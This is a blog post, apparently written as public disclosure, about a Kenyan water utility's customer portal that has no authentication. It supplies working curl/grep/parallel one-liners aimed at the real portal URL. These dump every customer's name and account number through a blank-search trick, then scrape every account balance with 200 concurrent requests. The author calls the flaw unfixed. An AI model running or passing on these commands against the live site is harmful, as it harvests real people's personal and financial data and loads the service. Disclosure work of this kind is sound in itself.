DEV Community 👩‍💻👨‍💻

Brian Onang'o
Brian Onang'o

Posted on

Using Bash to Scrape Data from Mombasa Water Portal

This article is intended to show some of the poor practices of implementing buggy IT systems, which are available to the public, with proof of concept tools to exploit the buggy systems, with a view to having the bugs fixed and raising the standard of Software Engineering practice in Kenya.

Of the many Water and Sanitation companies in Kenya, Mombasa Water and Nairobi Water seem to be among the few, if not the only ones, that have digitized their records and provided an online portal for their customers to check their records. Mombasa Water, however, in classical style, has implemented its system in a such a buggy way that it exposes all the accounts and their balances to the public. More than a year later, the bug has remained unfixed.

The portal itself does not use any authentication. This seems to be common practice with water, and utility providers seeing as KPLC self-service portal is designed in almost the same way. KPLC, however, implements some authentication and a token is required to access the API end point that returns data for a specific meter. But this token is not generated by the user from his credentials. This then provides security only against bots.

KPLC self service portal

The KPLC portal allows a user to query data for a specific Meter Number or Account Number. It is the same with the Mombasa Water Portal. And since it is very difficult to guess an account number or a meter number, these systems provide some rudimentary security against exposing all user data. KPLC has another trick. While the call to the API returns the name of the account holder as well as the other info, the name is filtered out and not shown in the table of the records displayed in the UI. This shows that there could be some privacy concern with them about having all this info available to the public. Whether there are already data laws that forbid such a practice, we know not. But we know that this practice is surely a violation of the privacy of its users.

But the designers and implementers of the Mombasa Water Portal are even worse. Their system does not even seem to have an API. To query it, you need to send a POST request to the page https://portal.mombasawater.co.ke/index.php with the search=ACCOUNT_NUMBER. This can be done in bash using curl:

curl --data "search=ACCOUNT_NUMBER" https://portal.mombasawater.co.ke/index.php
Enter fullscreen mode Exit fullscreen mode

This lacks the basic security that is provided by the KPLC system against brute-force account guessing bots.

Supplying a space character for the account number returns a list having the customer name and account number of all the accounts.

curl --data "search= " https://portal.mombasawater.co.ke/index.php
Enter fullscreen mode Exit fullscreen mode

To get account number and customer name we use grep and sed:

curl --data "search= " https://portal.mombasawater.co.ke/index.php | grep -o "Account Number.*" | sed -e 's/Customer Name:<div>/:/' | sed -e 's/Account Number:<div>//' |grep -o "[0-9]*:.*"
Enter fullscreen mode Exit fullscreen mode

To sort the data and save to a text file:

curl --data "search= " https://portal.mombasawater.co.ke/index.php | grep -o "Account Number.*" | sed -e 's/Customer Name:<div>/:/' | sed -e 's/Account Number:<div>//' |grep -o "[0-9]*:.*" |sort > mw.txt
Enter fullscreen mode Exit fullscreen mode

Fetching Account Balances

Account balances can be fetched by entering the account number into the Account Number Field of the form at the portal.

This task can also be automated using bash.
For a single account:

curl --data "search=ACCOUNT_NUMBER" https://portal.mombasawater.co.ke/index.php|grep -o "Customer Name:.*\|Account Number:.*\|Balance:.*"  | sed -e 's/<[^>]*>//g' | sed -e 's/\(Balance[^ ]*\) .*/\1/' | tr -d '\r\n' | sed 's/Customer Name:\(.*\)Account Number:\([0-9]*\)Balance:\(.*\)/\2:\3:\1/'
Enter fullscreen mode Exit fullscreen mode

For all accounts. Save to txt file with name in the format YYYY-MM-DDhh:hh:ss.balances

cat mw.txt | sed -e 's/:.*//g' | parallel -j200 "curl -sS --data \"search={}\" https://portal.mombasawater.co.ke/index.php | grep -o \"Customer Name:.*\|Account Number:.*\|Balance:.*\" | sed -e 's/<[^>]*>//g' | sed -e 's/\(Balance[^ ]*\) .*/\1/' |  tr -d '\r\n'|sed -e 's/\(Customer Name\)/\n\r\1/g' | sed -e 's/Customer Name:\(.*\)Account Number:\(.*\)Balance:\(.*\)/\2:\3:\t\1/g' >> \"$(date +\"%F%T\").balances\" && echo {#}"
Enter fullscreen mode Exit fullscreen mode

The one liner:

curl --data "search= " https://portal.mombasawater.co.ke/index.php | grep -o "Account Number.*" | sed -e 's/Customer Name:<div>/:/' | sed -e 's/Account Number:<div>//' |grep -o "[0-9]*:.*" |sort | sed -e 's/:.*//g' | parallel -j200 "curl -sS --data \"search={}\" https://portal.mombasawater.co.ke/index.php | grep -o \"Customer Name:.*\|Account Number:.*\|Balance:.*\" | sed -e 's/<[^>]*>//g' | sed -e 's/\(Balance[^ ]*\) .*/\1/' |  tr -d '\r\n'|sed -e 's/\(Customer Name\)/\n\r\1/g' | sed -e 's/Customer Name:\(.*\)Account Number:\(.*\)Balance:\(.*\)/\2:\3:\t\1/g' >> \"$(date +\"%F%T\").balances\" && echo {#}"
Enter fullscreen mode Exit fullscreen mode

With that single line a malicious actor is able to get the balance records, with the names for all accounts, of Mombasa Water as frequently as he likes and use that data for whatever on earth it can be used for. Our solution to this challenge, as well as for helping other WASH players to get up to speed with technological advancements is the openWASH, the open source WASH Management Information System. It may be several months or years away, but it's well in the pipeline.

Top comments (0)

Image description

Join the One Year Club

You can earn this badge by being a registered member of the DEV Community for at least one year. Create an account and get started today.